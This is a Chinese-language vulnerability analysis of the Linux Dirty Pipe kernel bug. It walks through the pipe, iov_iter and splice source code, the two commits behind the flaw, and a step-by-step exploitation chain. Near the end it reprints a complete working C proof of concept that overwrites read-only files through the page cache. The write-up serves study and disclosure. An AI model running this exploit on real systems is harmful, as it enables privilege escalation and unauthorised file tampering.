dirtypipe漏洞分析

不可视境界线最后变动于:2023年2月5日 下午

基本参考 –> kp <–

一、简介

Dirty Pipe 漏洞是 Linux 系统中的一个内核提权漏洞,漏洞危害堪比 Dirty COW,但相对于 Dirty COW 来说更加容易利用。

漏洞影响范围:pipe: merge anon_pipe_buf*_ops - linux commit (v5.8-rc1) ~ lib/iov_iter: initialize “flags” in new pipe_buffer(v5.17-rc6)

时间范围大概是 2020/5/21 - 2022/2/21。

二、环境搭建

在github上直接下载f6dd97版本, 借用了pwn.college的脚本. 然后内核编译设置借鉴kp的blog.

编译遇到的额外问题:

  • 经典的thunk.o, 已经遇到过了.

  • 然后又来个新活, 打了又一个patch. 真找了半天.

    image-20221109224329290
  • 然后又装了个dwarves, 因为BTF: .tmp_vmlinux.btf: pahole (pahole) is not available

三. 代码浅析

pipe相关函数接口(无源码, kernel doc)

read&write

1
2
3
4
5
6
7
8
9
10
const struct file_operations pipefifo_fops = {
.open = fifo_open,
.llseek = no_llseek,
.read_iter = pipe_read, // read
.write_iter = pipe_write, // write
.poll = pipe_poll,
.unlocked_ioctl = pipe_ioctl,
.release = pipe_release,
.fasync = pipe_fasync,
};

read&write函数声明如下:

1
2
static ssize_t pipe_read(struct kiocb *iocb, struct iov_iter *to)
static ssize_t pipe_write(struct kiocb *iocb, struct iov_iter *from)

只需简单知道:

  • iocb:中存放着获取当前 pipe 结构体的指针
  • from/to:从管道读出来的数据将要写入的地方,iov_iter 迭代器类型。

pipe_inode_info

pipe_inode_info 结构体存放了 pipe 机制所要用到的字段:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
/**
* struct pipe_inode_info - a linux kernel pipe
* @mutex: mutex protecting the whole thing
* @rd_wait: reader wait point in case of empty pipe
* @wr_wait: writer wait point in case of full pipe
* @head: The point of buffer production
* @tail: The point of buffer consumption
* @max_usage: The maximum number of slots that may be used in the ring
* @ring_size: total number of buffers (should be a power of 2)
* @tmp_page: cached released page
* @readers: number of current readers of this pipe
* @writers: number of current writers of this pipe
* @files: number of struct file referring this pipe (protected by ->i_lock)
* @r_counter: reader counter
* @w_counter: writer counter
* @fasync_readers: reader side fasync
* @fasync_writers: writer side fasync
* @bufs: the circular array of pipe buffers
* @user: the user who created this pipe
**/
struct pipe_inode_info {
struct mutex mutex;
wait_queue_head_t rd_wait, wr_wait;
unsigned int head;
unsigned int tail;
unsigned int max_usage;
unsigned int ring_size;
unsigned int readers;
unsigned int writers;
unsigned int files;
unsigned int r_counter;
unsigned int w_counter;
struct page *tmp_page;
struct fasync_struct *fasync_readers;
struct fasync_struct *fasync_writers;
struct pipe_buffer *bufs;
struct user_struct *user;
};

pipe 存放数据使用的是环形队列,即在定长大小的数据环(pipe buf ring)上,尽可能的存储数据.

  • head:标注队列首部的索引head 为接下来要写入的位置
  • tail:标注队列尾部的索引,tail 为接下来要读取的位置

pipe_buffer

该结构体存放着实际管道中存放的数据:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/**
* struct pipe_buffer - a linux kernel pipe buffer
* @page: the page containing the data for the pipe buffer
* @offset: offset of data inside the @page
* @len: length of data inside the @page
* @ops: operations associated with this buffer. See @pipe_buf_operations.
* @flags: pipe buffer flags. See above.
* @private: private data owned by the ops.
**/
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

这个结构体存放了包括页引用、页偏移、数据大小等关键信息。这里的 flag 共有这几种:

1
2
3
4
5
6
// include/linux/pipe_fs_i.h
#define PIPE_BUF_FLAG_LRU 0x01 /* page is on the LRU */
#define PIPE_BUF_FLAG_ATOMIC 0x02 /* was atomically mapped */
#define PIPE_BUF_FLAG_GIFT 0x04 /* page is a gift */
#define PIPE_BUF_FLAG_PACKET 0x08 /* read() as a packet */
#define PIPE_BUF_FLAG_CAN_MERGE 0x10 /* can merge buffers */

我们可以暂时不用去管这几种 flag 具体的意思。

iov_iter

结构体 iov_iter 用于迭代那种被分为多个页的数据,换句话说,该结构体将用于迭代一个个页面。其结构体如下所示:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
enum iter_type {
/* iter types */
ITER_IOVEC = 4,
ITER_KVEC = 8,
ITER_BVEC = 16,
ITER_PIPE = 32, // 表示正在迭代的数据是位于 pipe 中的
ITER_DISCARD = 64,
};

struct iov_iter {
/*
* Bit 0 is the read/write bit, set if we're writing.
* Bit 1 is the BVEC_FLAG_NO_REF bit, set if type is a bvec and
* the caller isn't expecting to drop a page reference when done.
*/
unsigned int type;
size_t iov_offset;
size_t count;
union {
const struct iovec *iov;
const struct kvec *kvec;
const struct bio_vec *bvec;
struct pipe_inode_info *pipe;
};
union {
unsigned long nr_segs;
struct {
unsigned int head;
unsigned int start_head;
};
};
};

其中,一些字段的意义如下:

  • type:表示当前迭代的数据是来自于什么结构,例如:

    • ITER_PIPE 表示当前迭代的数据为某个 pipe 中的页数据
    • ITER_DISCARD 表示写入当前 iov_iter 的数据全部丢弃。
    • ITER_KVEC do almost the same, but with data in kernel space,
    • ITER_BVEC to work with parts of memory mapped pages.

    后续针对 iov_iter 做内存读写时,会根据这个 type 来执行不同类型的内存读写操作。

  • iov_offset:当前所迭代到 page 的相对偏移,读写将从该 page 的这个相对偏移开始。

  • cout:可读写的数组字节大小

pipe_read相关调用结构

flowchart TB
s["pipe_read(pipe->iter)"] --> copy_page_to_iter
copy_page_to_iter -->|iter KVEC+BVEC| copy_to_iter
copy_page_to_iter -->|ITER_PIPE| copy_page_to_iter_pipe
copy_page_to_iter -->|other type| copy_page_to_iter_iovec
copy_to_iter --> _copy_to_iter
_copy_to_iter -->|iter is pipe| copy_pipe_to_iter
_copy_to_iter -->|other| iterate_and_advance???
other_callpoint -->|with iov_iter is pipe| copy_to_iter
copy_pipe_to_iter --> push_pipe
copy_pipe_to_iter --> a["memcpy_to_page(per page)"]

  • 大致流程: 循环遍历pipe->bufs数组, 使用copy_page_to_iter将buf中的一整个page复制到iter中, 如果iter是pipe, 则不复制直接引用, 如此循环再顾及到截断等问题就结束读取.
  • copy_pipe_to_iter真是够有迷惑性的, 它是指iter的类型是pipe, 要从addr指向的页面中复制内容到pipe buf中.
  • 由于copy_page_to_iter_pipe pipe buf 是直接引用其他页,因此在 page_write 处必须确保新传来的数据不会写入这样的页面中,而这种保证就依赖于 MERGE 标志。然而可以看到一个有意思的事情:虽然 recv pipe buf 结构体上的众多字段都被重新赋值,但有一个字段却被遗漏了那就是 flags 字段
  • push_pipe的作用是检查要写入的pipe的空间是否足够. 如果不够则进行扩充. 当 kernel 循环扩充 pipe_buffer 上的页时,这里也并没有初始化 pipe_buffer 的 flag 标志!又因为 pipe_buffer 在设计上便是一个环,因此在扩孔 pipe_buffer 时,这里也将重用先前 pipe_buffer 所设置的 flag
  • 一个小问题, 看到void *kaddr = kmap_atomic(page);函数, 查到了highmem这个概念. 不过函数具体实现是和架构相关的.

这里简单总结一下 copy_page_to_iter 函数与 copy_to_iter 函数在复制数据进 pipe 时 所实现的差异:

  • 前者是在一个完整 page 上,将数据复制给 pipe。因此 pipe buf 只需直接引用该页,并记录下 offset 和 len,即可完成复制操作。
  • 后者不保证源数据在完整 page 上,而是提供了 addr 和 len,因此 pipe buf 需要自己准备存放数据的 page。

copy_page_to_iter_pipe代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
// 获取待写入的 pipe 结构体
struct pipe_inode_info *pipe = i->pipe;
struct pipe_buffer *buf;
// 获取待写入的 pipe 结构体的一些信息,例如 head、tail等等
unsigned int p_tail = pipe->tail;
unsigned int p_mask = pipe->ring_size - 1;
unsigned int i_head = i->head;
size_t off;

// 这里是在做一些 check
if (unlikely(bytes > i->count))
bytes = i->count;

if (unlikely(!bytes))
return 0;

if (!sanity(i))
return 0;

// 获取待写入的相对偏移位置
off = i->iov_offset;
// 获取待接收数据的 pipe buf
buf = &pipe->bufs[i_head & p_mask];
if (off) {
if (offset == off && buf->page == page) {
/* merge with the last one */
buf->len += bytes;
i->iov_offset += bytes;
goto out;
}
i_head++;
buf = &pipe->bufs[i_head & p_mask];
}
// 如果待写入的管道已满,则直接返回
if (pipe_full(i_head, p_tail, pipe->max_usage))
return 0;

buf->ops = &page_cache_pipe_buf_ops;
// 增加该页的 refcount
get_page(page);
buf->page = page; // 直接引用已有的页
buf->offset = offset;
buf->len = bytes;

pipe->head = i_head + 1;
i->iov_offset = offset + bytes;
i->head = i_head;
out:
i->count -= bytes;
return bytes;
}

pipe_write

源码

pipe_write第一段:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
head = pipe->head;
was_empty = pipe_empty(head, pipe->tail);
chars = total_len & (PAGE_SIZE-1);
if (chars && !was_empty) {
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
int offset = buf->offset + buf->len;

if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
offset + chars <= PAGE_SIZE) {
ret = pipe_buf_confirm(pipe, buf);
if (ret)
goto out;

ret = copy_page_from_iter(buf->page, offset, chars, from);
if (unlikely(ret < chars)) {
ret = -EFAULT;
goto out;
}

buf->len += ret;
if (!iov_iter_count(from))
goto out;
}
}

函数目的是从iter复制到pipe的buf中.

如果说当前 pipe buf 中已经存在数据,并且
iter总长度不是页大小的整数倍 && pipe buf的起始位置+pipe已有数据长度+iter总长度mod页大小 < PAGE_SIZE,
那么直接先把iter开头一段填充到pipe buf中进行数据合并。

这个合并操作需要 pipe buf 有 PIPE_BUF_FLAG_CAN_MERGE 标志,该标志只要 pipe_write 所对应的 fd 没有设置 O_DIRECT 标志即可自动设置。

其次是正常的页面写入逻辑:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
for (;;) {
// 如果一个管道没有读者,则说明管道已经被破坏,生成 SIGPIPE 信号
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
if (!ret)
ret = -EPIPE;
break;
}
// 尝试循环往管道内写入数据
head = pipe->head;
if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[head & mask];
struct page *page = pipe->tmp_page;
int copied;
// 获取先前被释放但是缓存起来的 tmp_page。
// 如果存在 tmp_page 则在向 pipe buf 写入数据时就可直接重用而无需分配
if (!page) {
page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
if (unlikely(!page)) {
ret = ret ? : -ENOMEM;
break;
}
pipe->tmp_page = page;
}

/* Allocate a slot in the ring in advance and attach an
* empty buffer. If we fault or otherwise fail to use
* it, either the reader will consume it or it'll still
* be there for the next write.
*/
spin_lock_irq(&pipe->rd_wait.lock);

head = pipe->head;
if (pipe_full(head, pipe->tail, pipe->max_usage)) {
spin_unlock_irq(&pipe->rd_wait.lock);
continue;
}

pipe->head = head + 1;
spin_unlock_irq(&pipe->rd_wait.lock);

/* Insert it into the buffer array */
// 往新的 pipe buf 中写入数据
buf = &pipe->bufs[head & mask];
buf->page = page;
buf->ops = &anon_pipe_buf_ops; // 设置匿名管道操作
buf->offset = 0;
buf->len = 0;
// 如果 fd 设置了 O_DIRECT,则每次写入时都会占用新的一页,而不会合并
if (is_packetized(filp))
buf->flags = PIPE_BUF_FLAG_PACKET;
else
buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
pipe->tmp_page = NULL;
// 复制页数据
copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
if (!ret)
ret = -EFAULT;
break;
}
ret += copied;
buf->offset = 0;
buf->len = copied;

if (!iov_iter_count(from))
break;
}

if (!pipe_full(head, pipe->tail, pipe->max_usage))
continue;

/* Wait for buffer space to become available. */
if (filp->f_flags & O_NONBLOCK) {
if (!ret)
ret = -EAGAIN;
break;
}
if (signal_pending(current)) {
if (!ret)
ret = -ERESTARTSYS;
break;
}
...
}

这个 tmp_page 简单讲一下。如果该 pipe buf 所持有的 page 只有它自己持有,并且现在打算将其释放,那么 pipe buf 就私下不释放该 page,而是将其缓存起来供后续使用:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
static void anon_pipe_buf_release(struct pipe_inode_info *pipe,
struct pipe_buffer *buf)
{
struct page *page = buf->page;

/*
* If nobody else uses this page, and we don't already have a
* temporary page, let's keep track of it as a one-deep
* allocation cache. (Otherwise just release our reference to it)
*/
if (page_count(page) == 1 && !pipe->tmp_page)
pipe->tmp_page = page;
else
put_page(page);
}

从 pipe 读写操作中我们可以得知,pipe bufs 存放的页面无非两种:

  1. 直接引用其他不变页(例如文件缓存页),这样就无需进行数据复制操作
  2. 自己创建页,需要进行数据复制

由 pipe 机制来保证存放在 pipe bufs 中的页数据,不会被 pipe 本身给覆写。同时注意只有在自己创建的页上,才能进行 Merge 操作。

这是因为pipe本意只是一个消息通道, 不应出现对内存的预期外修改, 即merge操作.

do_splice 函数

Linux 库函数 splice 的作用是,将某个 fd 的数据不经过用户层,直接拷贝进另一个 fd 中。其函数声明如下:

1
2
3
4
#define _GNU_SOURCE         /* See feature_test_macros(7) */
#include <fcntl.h>

ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags);

这里的 fd 只能有两种情况:pipe fd 或 file fd,因此在 do_splice 函数中,内核也会对 fd 的类型做特判,来执行不同的数据传递操作。

这里,我们只需关注 From-fd 为 file,To-fd 为 pipe ,即数据从文件传递至管道的情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
/*
* Determine where to splice to/from.
*/
long do_splice(struct file *in, loff_t __user *off_in,
struct file *out, loff_t __user *off_out,
size_t len, unsigned int flags)
{
struct pipe_inode_info *ipipe;
struct pipe_inode_info *opipe;
loff_t offset;
long ret;

ipipe = get_pipe_info(in);
opipe = get_pipe_info(out);
...;

// 当数据从文件复制给管道时
if (opipe) {
...
// 等待 pipe 存在空闲空间
if (out->f_flags & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;

pipe_lock(opipe);
ret = wait_for_space(opipe, flags);
// 如果等到 pipe 存在空闲空间后
if (!ret) {
unsigned int p_space;
// 获取待传递数据大小
/* Don't try to read more the pipe has space for. */
p_space = opipe->max_usage - pipe_occupancy(opipe->head, opipe->tail);
len = min_t(size_t, len, p_space << PAGE_SHIFT);
// 执行真正的传递操作
ret = do_splice_to(in, &offset, opipe, len, flags);
}
...
return ret;
}

...
}

而在 do_splice_to 函数中,内核会根据文件系统类型,来调用对应的 splice_read 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
/*
* Attempt to initiate a splice from a file to a pipe.
*/
static long do_splice_to(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe, size_t len,
unsigned int flags)
{
int ret;

if (unlikely(!(in->f_mode & FMODE_READ)))
return -EBADF;

ret = rw_verify_area(READ, in, ppos, len);
if (unlikely(ret < 0))
return ret;

if (unlikely(len > MAX_RW_COUNT))
len = MAX_RW_COUNT;
// 调用 splice_read 函数
if (in->f_op->splice_read)
return in->f_op->splice_read(in, ppos, pipe, len, flags);
return default_file_splice_read(in, ppos, pipe, len, flags);
}

以 linux 中最常见的文件系统 ext4 为例,这是 ext4 文件系统中所设置的一些关键方法:

1
2
3
4
5
6
7
8
// fs/ext4/file.c
const struct file_operations ext4_file_operations = {
...
.read_iter = ext4_file_read_iter,
...
.splice_read = generic_file_splice_read,
...
};

因此最终 do_splice_to 函数会调用到 generic_file_splice_read 函数来执行数据传递:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
/**
* generic_file_splice_read - splice data from file to a pipe
* @in: file to splice from
* @ppos: position in @in
* @pipe: pipe to splice to
* @len: number of bytes to splice
* @flags: splice modifier flags
*
* Description:
* Will read pages from given file and fill them into a pipe. Can be
* used as long as it has more or less sane ->read_iter().
*
*/
ssize_t generic_file_splice_read(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe, size_t len,
unsigned int flags)
{
struct iov_iter to;
struct kiocb kiocb;
unsigned int i_head;
int ret;

// 根据 pipe 结构体,创建 iov_iter 结构
iov_iter_pipe(&to, READ, pipe, len);
i_head = to.head;
// 创建 kiocb 结构
init_sync_kiocb(&kiocb, in);
kiocb.ki_pos = *ppos;
// 调用 call_read_iter 执行实际的数据传输操作 !!!
ret = call_read_iter(in, &kiocb, &to);
// 如果数据正常传输
if (ret > 0) {
// 更新文件访问情况
*ppos = kiocb.ki_pos;
file_accessed(in);
// 如果数据传输失败
} else if (ret < 0) {
to.head = i_head;
to.iov_offset = 0;
iov_iter_advance(&to, 0); /* to free what was emitted */
/*
* callers of ->splice_read() expect -EAGAIN on
* "can't put anything in there", rather than -EFAULT.
*/
if (ret == -EFAULT)
ret = -EAGAIN;
}

return ret;
}

generic_file_splice_read 函数的代码中可以看到,该函数最终会调用 call_read_iter 函数来做数据传递;而该函数又会调用特定于文件系统的 read_iter 函数:

1
2
3
4
5
static inline ssize_t call_read_iter(struct file *file, struct kiocb *kio,
struct iov_iter *iter)
{
return file->f_op->read_iter(kio, iter);
}

ext4_file_operations 代码中可以得知,call_read_iter 函数调用到的是 ext4_file_read_iter 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
static ssize_t ext4_file_read_iter(struct kiocb *iocb, struct iov_iter *to)
{
struct inode *inode = file_inode(iocb->ki_filp);
// 一些简单的判断
if (unlikely(ext4_forced_shutdown(EXT4_SB(inode->i_sb))))
return -EIO;

if (!iov_iter_count(to))
return 0; /* skip atime */

#ifdef CONFIG_FS_DAX
if (IS_DAX(inode))
return ext4_dax_read_iter(iocb, to);
#endif
if (iocb->ki_flags & IOCB_DIRECT)
return ext4_dio_read_iter(iocb, to);
// 没设置 O_DIRECT 的走这里
return generic_file_read_iter(iocb, to);
}

What is CONFIG_FS_DAX – Direct Access (DAX) support found in fs/Kconfig

然后该函数又调 generic_file_read_iter

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
/**
* generic_file_read_iter - generic filesystem read routine
* @iocb: kernel I/O control block
* @iter: destination for the data read
*
* This is the "read_iter()" routine for all filesystems
* that can use the page cache directly.
* Return:
* * number of bytes copied, even for partial reads
* * negative error code if nothing was read
*/
ssize_t
generic_file_read_iter(struct kiocb *iocb, struct iov_iter *iter)
{
size_t count = iov_iter_count(iter);
ssize_t retval = 0;

if (!count)
goto out; /* skip atime */

if (iocb->ki_flags & IOCB_DIRECT) {
...
}
// 继续调用
retval = generic_file_buffered_read(iocb, iter, retval);
out:
return retval;
}

接着又调 generic_file_buffered_read函数。该函数代码量太大,只简单讲讲其大致功能:

  • 尝试在该文件已有的文件缓存映射表中查找先前已经映射的文件缓存
    • 如果没文件缓存,则读取磁盘上的文件数据,创建新的文件缓存
    • 如果有文件缓存但是缓存过期了,则更新这个文件缓存
  • 到了这一步,此时是一定有文件缓存了。则调用 copy_page_to_iter 函数来将文件缓存页上的数据,拷贝进 pipe 中。

这个函数正是我们先前所介绍过的,因此整个 splice 系统调用,就可以和 pipe 那里的未初始化漏洞串起来了。

四、漏洞成因

这个漏洞并非一蹴而就,而是由两个 commit 的错误相互结合导致的:

  • new iov_iter flavour: pipe-backed - linux commit 241699:引入字段的未初始化漏洞。 push_pipecopy_page_to_iter_pipe 两个函数在设置 pipe_buffer 结构体时均未初始化 flag 字段。

  • pipe: merge anon_pipe_buf*_ops - linux commit f6dd97:在该 commit 前,内核通过比较 pipe_buf->ops 的地址来判断两块 pipe_buf 是否是可合并的。这种编码并不优雅,因为无论是否可合并,pipe_buf->ops 实际指向的几个函数指针都是同一个:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    // fs/pipe.c
    static const struct pipe_buf_operations anon_pipe_buf_ops = {
    .confirm = generic_pipe_buf_confirm,
    .release = anon_pipe_buf_release,
    .steal = anon_pipe_buf_steal,
    .get = generic_pipe_buf_get,
    };

    static const struct pipe_buf_operations anon_pipe_buf_nomerge_ops = {
    .confirm = generic_pipe_buf_confirm,
    .release = anon_pipe_buf_release,
    .steal = anon_pipe_buf_steal,
    .get = generic_pipe_buf_get,
    };

    static const struct pipe_buf_operations packet_pipe_buf_ops = {
    .confirm = generic_pipe_buf_confirm,
    .release = anon_pipe_buf_release,
    .steal = anon_pipe_buf_steal,
    .get = generic_pipe_buf_get,
    };

    可以看到,这么 tricky 的代码非常的不优雅,因此在该 commit(f6dd97) 中,linux 重构了这部分代码,启用了新的 pipe buf 标志:PIPE_BUF_FLAG_CAN_MERGE

    1
    2
    3
    4
    5
    6
    // include/linux/pipe_fs_i.h
    #define PIPE_BUF_FLAG_LRU 0x01 /* page is on the LRU */
    #define PIPE_BUF_FLAG_ATOMIC 0x02 /* was atomically mapped */
    #define PIPE_BUF_FLAG_GIFT 0x04 /* page is a gift */
    #define PIPE_BUF_FLAG_PACKET 0x08 /* read() as a packet */
    #define PIPE_BUF_FLAG_CAN_MERGE 0x10 /* can merge buffers */ // <= 新引入的 flag

    整个重构过程并没有问题,唯一带来的副作用就是引入了新的 pipe buf 标志:PIPE_BUF_FLAG_CAN_MERGE

尽管第一个 commit 引入了字段未初始化漏洞,但该漏洞仍然无法造成较大的影响,因为可选的几个 pipe buf flag 中没有什么是可以利用的。但是当第二个 commit 引入了新的 pipe buf flag:PIPE_BUF_FLAG_CAN_MERGE 时,因为新的 pipe_buf 可以通过未初始化漏洞,来重用旧的 flag,例如 PIPE_BUF_FLAG_CAN_MERGE,来打破 page buf 的完整性,使得允许对那些本不该写入的页进行写入 (例如本不该带有 PIPE_BUF_FLAG_CAN_MERGE 标志的页,诸如文件缓存页等等)

注意,这里说的只读页,在 pipe 中并非使用权限控制等技术来保证不写,而是通过 pipe 所实现的逻辑来保证。因此,当 pipe 实现的逻辑出现了问题,那么 pipe 就可以尝试写入只读页,进而达到任意文件写的目的。

五、漏洞利用

tryhackme

通过上面的代码分析我们可以简单推断出这样的一条漏洞利用链:

  1. 创建管道(务必不要带上 O_DIRECT)

  2. 往管道中直接写入大量数据,使得 pipe 结构体中所有 page buf 的 flag 全部都设置了 PIPE_BUF_FLAG_CAN_MERGE 标志。

  3. 从该管道中将数据全部读取出来,释放所有 page buf。

  4. 调用 splice,将数据长度不与页大小对齐可读文件数据,传递至该管道中。这样在管道的 head 位置,势必会有一个 page buf,其中 page 指向文件缓存flags 为 PIPE_BUF_FLAG_CAN_MERGE

    因为 page buf 在重分配时不会初始化 flags,因此这里的 flags 将仍然保留为 PIPE_BUF_FLAG_CAN_MERGE。

  5. 直接继续往该管道中写入目标数据,这样由于 PIPE_BUF_FLAG_CAN_MERGE 标志仍然存在,新写入的数据将会直接与 page buf 所指向的文件缓存合并。

  6. 此时访问该文件,则内核会将被修改后的文件缓存中的数据返回,这样便可达到在内核层面任意文件写的目的。

需要注意的是,通过漏洞来“意外”修改文件缓存,不会使该文件缓存重新写回磁盘上。只有当内核的其他模块主动改写了这块文件缓存,使得该文件缓存变脏(dirty),这样才会把被修改后的文件缓存保存回磁盘上。

内核判断一个文件缓存是否 dirty,并非判断上面的数据有无被改写,而是判断其 dirty 标志。通过 dirty pipe 漏洞来改写文件缓存并不会影响到上面的 dirty 标志。

介于 cm4all 那边已经给出了非常清晰易懂的 POC,因此这里直接贴出它的 POC:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
* Create a pipe where all "bufs" on the pipe_inode_info ring have the
* PIPE_BUF_FLAG_CAN_MERGE flag set.
*/
static void prepare_pipe(int p[2])
{
if (pipe(p)) abort();

const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
static char buffer[4096];

/* fill the pipe completely; each pipe_buffer will now have
the PIPE_BUF_FLAG_CAN_MERGE flag */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
write(p[1], buffer, n);
r -= n;
}

/* drain the pipe, freeing all pipe_buffer instances (but
leaving the flags initialized) */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
read(p[0], buffer, n);
r -= n;
}

/* the pipe is now empty, and if somebody adds a new
pipe_buffer without initializing its "flags", the buffer
will be mergeable */
}

int main(int argc, char **argv)
{
if (argc != 4) {
fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
return EXIT_FAILURE;
}

/* dumb command-line argument parser */
const char *const path = argv[1];
loff_t offset = strtoul(argv[2], NULL, 0);
const char *const data = argv[3];
const size_t data_size = strlen(data);

if (offset % PAGE_SIZE == 0) {
fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
return EXIT_FAILURE;
}

const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
const loff_t end_offset = offset + (loff_t)data_size;
if (end_offset > next_page) {
fprintf(stderr, "Sorry, cannot write across a page boundary\n");
return EXIT_FAILURE;
}

/* open the input file and validate the specified offset */
const int fd = open(path, O_RDONLY); // yes, read-only! :-)
if (fd < 0) {
perror("open failed");
return EXIT_FAILURE;
}

struct stat st;
if (fstat(fd, &st)) {
perror("stat failed");
return EXIT_FAILURE;
}

if (offset > st.st_size) {
fprintf(stderr, "Offset is not inside the file\n");
return EXIT_FAILURE;
}

if (end_offset > st.st_size) {
fprintf(stderr, "Sorry, cannot enlarge the file\n");
return EXIT_FAILURE;
}

/* create the pipe with all flags initialized with
PIPE_BUF_FLAG_CAN_MERGE */
int p[2];
prepare_pipe(p);

/* splice one byte from before the specified offset into the
pipe; this will add a reference to the page cache, but
since copy_page_to_iter_pipe() does not initialize the
"flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
--offset;
ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
if (nbytes < 0) {
perror("splice failed");
return EXIT_FAILURE;
}
if (nbytes == 0) {
fprintf(stderr, "short splice\n");
return EXIT_FAILURE;
}

/* the following write will not create a new pipe_buffer, but
will instead write into the page cache, because of the
PIPE_BUF_FLAG_CAN_MERGE flag */
nbytes = write(p[1], data, data_size);
if (nbytes < 0) {
perror("write failed");
return EXIT_FAILURE;
}
if ((size_t)nbytes < data_size) {
fprintf(stderr, "short write\n");
return EXIT_FAILURE;
}

printf("It worked!\n");
return EXIT_SUCCESS;
}

六. 漏洞修复

https://android-review.googlesource.com/c/kernel/common/+/1998671/1/lib/iov_iter.c

https://lore.kernel.org/lkml/20220221100313.1504449-1-max.kellermann@ionos.com/

七. 漏洞发现过程

  • 2021-04-29: first support ticket about file corruption
  • 2022-02-19: file corruption problem identified as Linux kernel bug, which turned out to be an exploitable vulnerability

漏洞的生命周期显然比较漫长.

背景:

  • zip: The structure of a PKZip file

    • End of central directory record (EOCD)Central directory file header
    Structure of the central directory
    • central dirctory header其实都是放在文件末尾, 这样便于添加新文件, 也可以把zip文件变成自我解压缩的zip文件, 只要在含有zip数据的可执行文件后加上header(?)
    • The ZIP format can hold collections of files without an external archiver, but is less compact than compressed tarballs holding the same data, because it compresses files individually and cannot take advantage of redundancy between files (solid compression).
    image-20221112212650539
  • zlib Sync Flush

    • The “sync flush” is what zlib implements when used with the Z_SYNC_FLUSH flag. It performs the following tasks:

      1. If there is some buffered but not yet compressed data, then this data is compressed into one or several blocks (the type for each block will depend on the amount and nature of data).
      2. A new type 0 block with empty contents is appended.

      A type 0 block with empty contents consists of:

      • the three-bit block header;
      • 0 to 7 bits equal to zero, to achieve byte alignment;
      • the four-byte sequence 00 00 FF FF.
  • sendfile是splice的一个子集, 现在的splice可以任意的传送, 两边的选择可以有pipe, socket, fd这些. sendfile在2.6.23已失效, 不过API接口仍然保存, 但是实际的函数已是do_splice_direct, 因为splice可以轻松地模拟sendfile.

    • 该函数会继续调用splice_direct_to_actor , This is a special case helper to splice directly between two points, without requiring an explicit pipe. Internally an allocated pipe is cached in the process, and reused during the lifetime of that process. pipe是作为中间人传递数据的, 以便于利用其他的splice函数. 反正pipe也是引用已有的page.
